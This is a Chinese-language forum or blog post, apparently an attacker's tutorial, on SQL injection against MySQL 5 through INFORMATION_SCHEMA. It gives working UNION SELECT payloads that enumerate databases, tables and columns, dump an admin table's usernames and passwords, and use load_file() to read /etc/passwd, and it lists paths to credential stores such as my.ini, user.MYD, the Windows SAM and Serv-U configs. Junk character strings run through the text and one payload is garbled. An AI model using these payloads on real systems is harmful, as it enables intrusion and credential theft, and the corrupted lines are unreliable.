mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。

( c( E$ a; ?- k3 W6 c1 _
* w+ k+ k( I7 F8 N7 H2 X# Y+ f& a
6 r% y  \4 t% B: o" p% u+ {" S7 q5 xMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
5 u/ Z! B0 r* U; R' U中记录了Mysql中所有
& W4 ~# B! ?' Q8 q  e存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
8 ~9 b; M' o' }" u明。
1.得到所有数据库名：
|SCHEMATA ->存储数据库名的表
4 j0 R* i4 Q6 d! R/ C0 a|—字段：SCHEMA_NAME ->数据库名称
, R+ @7 |. L/ j( |
|TABLES ->存储表名
9 O- B; O9 X5 |, z; W! w|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|—字段：TABLE_NAME ->存储表的表名

2 H  }( {. C& {' U" z+ E! F|COLUMNS ->存储的字段名表
|—字段：TABLE_SCHEMA ->该字段所属数据库名
# }  N' N% o: T* @( l& d8 B|—字段：TABLE_NAME ->存储所属表的名称
% p  G0 F! ^5 I- {; I) c8 p
4 r; L4 j3 T2 c# M5 Y. m|—字段：COLUMN_NAME ->该字段的名称
% B; q* ~, U! y1 k
#########################################################################
##

0×001 获取系统信息:
8 W! `, A1 z1 l4 s, m- t9 `" G
union select 1,2,3,4,5,concat
(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
, z" j& D/ _, j(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*

& Q- \4 ?2 a( @2 {3 L/*

@@global.version_compile_os 获取系统版本

; T+ r. Z' Q$ r/ @$ J8 S@@datadir 数据库路径
, \2 r5 u7 L* @database() 当前数据库名称
5 h9 T  R5 g4 ~% u; r$ u/ r2 F0x3c62723e 换行HEX值

' h! {5 y- A) E$ H' L*/

######################################################################
8 K4 L. ^7 Q# C5 h% [' g! L* j
0×002 获取表名

7 N6 j; N' q, _union select 1,2,group_concat(table_name),4,5,6,7,8,9 from
" w- c7 ?& L4 R; R2 Y1 Ainformation_schema.tables where table_schema=0x67617264656e /*

  V3 Y1 @: E( t7 s% u# D$ j/*
+ o5 ?1 g4 N' J
+ h1 D% d  v1 x0x67617264656e 为当前数据库名

group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
0 g5 }& ~" s0 L  z& z4 U
5 h! R& Y# C, T7 m3 v/ \0 ~*/
4 L/ S/ s, z4 y; S
7 d8 |- B; E& b* j# c" @5 B######################################################################
: y; D7 M( a8 E, z
0×003 获取字段

( R& @" Y+ ~6 [8 D6 L) punion select 1,2,group_concat(column_name),4,5,6,7,8,9 from
" l! K2 R: w. {2 M8 \" cinformation_schema.columns where table_name=0x61646d696e and


table_schema=0x67617264656e limit 1 /*
7 l2 o1 R$ g5 |0 I0 w7 G# a
/*

group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段

. W; m: B2 |) T8 D0 ~0x61646d696e ->选择一个表

% m! U! M- ?$ m  Y$ |0x67617264656e ->数据库名
% J' i* o, {. R$ L/ V. b/ Y! e
*/

5 ?* W- _& S8 T+ B#####################################################################
% K3 B6 ~# G8 j3 w( K9 k$ Q; O
7 p+ R& Z3 B  ~0×004 获取数据
, I; w7 A6 Z# o
union select 1,2,3
5 y# r  }& @+ I7 T,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin

union select 1,group_concat(id),group_concat(adname),4,5,group_concat
2 ^: J1 O$ `! l8 K4 E(adpassword),6,7,8 from admin

! D4 o% w2 W% I& Y' W2 Y& e/*

1 I' C8 x) B( U) v' I4 N  }. q0x3c62723e 换行符号HEX编码
9 ]/ A3 V. |  a  }" V8 D) D
; A  D( j' m* i6 \( _; K$ `2 u, O/ kgroup_concat 同时获得该字段所有数据
, g$ H2 D9 w( B8 @* x( I: e
0 `# l: X( X* J*/
! @7 b7 ]9 h; O$ |



+ o$ p  U3 g5 S0 b
+ ]3 y3 O& X, q1 k6 ~4 O3 e顺便添加一些mysql注入时非常有用的一些东西
! \, l* [6 _6 E( z
/ n6 [' t! D- p0 w) N/ O简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。

1:system_user() 系统用户名
2:user()        用户名
) |3 V1 E5 G, d) c' P7 H3:current_user()  当前用户名
- m6 h3 e2 s( S7 G; C/ i: ~4:session_user()连接数据库的用户名
) h. d- C- W9 v9 G' b0 k5:database()    数据库名
2 _# d  u- i# t0 B6 F- e6:version()     MYSQL数据库版本
7:load_file()   MYSQL读取本地文件的函数
8@datadir     读取数据库路径
9@basedir    MYSQL 安装路径
10@version_compile_os   操作系统  Windows Server 2003,
* T$ G( j2 Z( Q5 G7 I; p- n: E收集的一些路径：
+ k  b3 A7 u0 G' M$ }+ JWINDOWS下:
) e4 L4 I0 E8 i  p! H2 Z1 }c:/boot.ini          //查看系统版本
' `$ B- j: l# s) l' Q# R# U. }8 Hc:/windows/php.ini   //php配置信息
c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
c:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
" j6 L5 v, [5 x. x  o8 l0 qc:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
6 Z- s& f8 q5 g" R( X: ?! `c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
( v3 H' O/ \' o$ ec:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
# N: r9 \( t6 r1 U' ]c:\Program Files\RhinoSoft.com\ServUDaemon.exe
. W1 y) l& F5 a9 ~9 j) tC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
* @+ f& f3 }+ y, e3 ~' _" a+ C* ac:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.


c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
5 h. @8 K* e, e1 lC:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

) u, v+ e' k- k7 p. j4 fLUNIX/UNIX下:
( T6 \; ~# x/ a6 e7 ~0 {9 U/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
' p0 i  W5 I; R. o6 s- Z/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/ Z: U( f) [5 E0 Z) [/etc/sysconfig/iptables //从中得到防火墙规则策略
/ }# i& Y8 E$ g* }( h) L& ~4 M/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
4 F; l0 Z1 S+ {/etc/redhat-release //系统版本
/etc/issue
& Y/ k! u5 b3 s  d( z  _3 E  R- ~/etc/issue.net
) F3 S& ^" v$ x+ n+ ]2 z/usr/local/app/php5/lib/php.ini //PHP相关设置
" F' L1 ]: v  z6 g1 E: P9 w6 T/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
- B% R, ?8 K1 ?& @& |/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
# Q8 p6 Y9 v$ R, v/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
( b- q3 Z4 p( C3 N/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
) I0 y# u+ o" Q/ J1 V/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略
load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
1 b$ K; }3 ]5 T# t1 {# ^replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
! S- S1 {) w5 w& B: Jreplace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
$ X' D! q: C0 q( ^: h- d上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
/ G( ^4 y- F+ S" w) O9 ~4 B% e; Q